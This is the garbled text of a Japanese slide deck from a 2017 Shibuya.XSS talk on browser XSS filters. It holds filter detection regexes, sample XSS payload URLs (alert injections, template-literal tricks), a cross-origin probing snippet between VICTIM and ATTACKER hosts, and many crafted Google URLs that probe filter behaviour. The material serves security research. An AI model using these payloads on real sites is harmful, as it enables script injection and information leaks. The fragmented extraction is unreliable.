2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
View Slide
❶➌❷❹
https://example.com/?q=">">
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OKDate: Tue, 28 Mar 2017 06:16:00 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Server: gwsX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGIN
https://example.com/?q=">https://example.com/#5382863726995448701">">
">https://example.com/?q=">
https://example.com/?q=">https://example.com/#5382863726995448701
<script> - Google 検索(function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>
<br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>https://example.com/?
{{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}[...]{(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0*((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{{}{{[...]{{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{[...]">
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.">
">[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}x="";alert(1)//"
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdfhttp://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=<br/>q = "";document#body.innerHTML="<xss>";<br/>URL: ?q=";document.body.innerHTML="
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=<br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>URL: ?"/++.+++=
"style=:\javascript:-vbscript:-vbs:-",x[]="{toString:"{valueOf:
type="text/javascript">
window#name//Syntax Errorwindow^name//Syntax OK window.name<br/>
url=location.search.slice(1);if(url^indexOf(":")!=-1){url=null;}onload=function(){if(url){location=url;}}
https://example.com/?q=";alert`1`//<br/>q = "";alert`1`//";<br/>https://www.slideshare.net/x00mario/es6-en/34ECMAScript 6 from an Attacker's Perspective- Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++`https://example.com/?q=[USER_INPUT]<br/>foo=``;<br/>q="[USER_INPUT]";<br/><br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>
https://example.com/?+onfiles+++=.type="text/javascript">[...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?IFRAME ERRORhttps://ATTACKER/win=window.open(…) if(win.length == 0){////}else{//}…
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK[...]Server: gwsX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.aegoogle.asgoogle.cagoogle.cogoogle.co.ingoogle.co.jpgoogle.co.krgoogle.co.nzgoogle.co.ukgoogle.com.brgoogle.com.mxgoogle.degoogle.esgoogle.frgoogle.itgoogle.plgoogle.ptgoogle.ru...(
✨✨✨
{
0 1 2 3 4 5 6 7 8 9 10https://example.com/
0 1 2 3 4 5 6 7 8 9 10https://example.com/?
0x01-08 0x0E-1F!"$%'()*;=^`|~0x09-0D 0x20 +&>#,/:?[\]{}-.@_A a0x000-9 <B-Z b-z
[email protected]{[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔✔✔✔
[email protected]
https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=
https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ca/?"[email protected]=...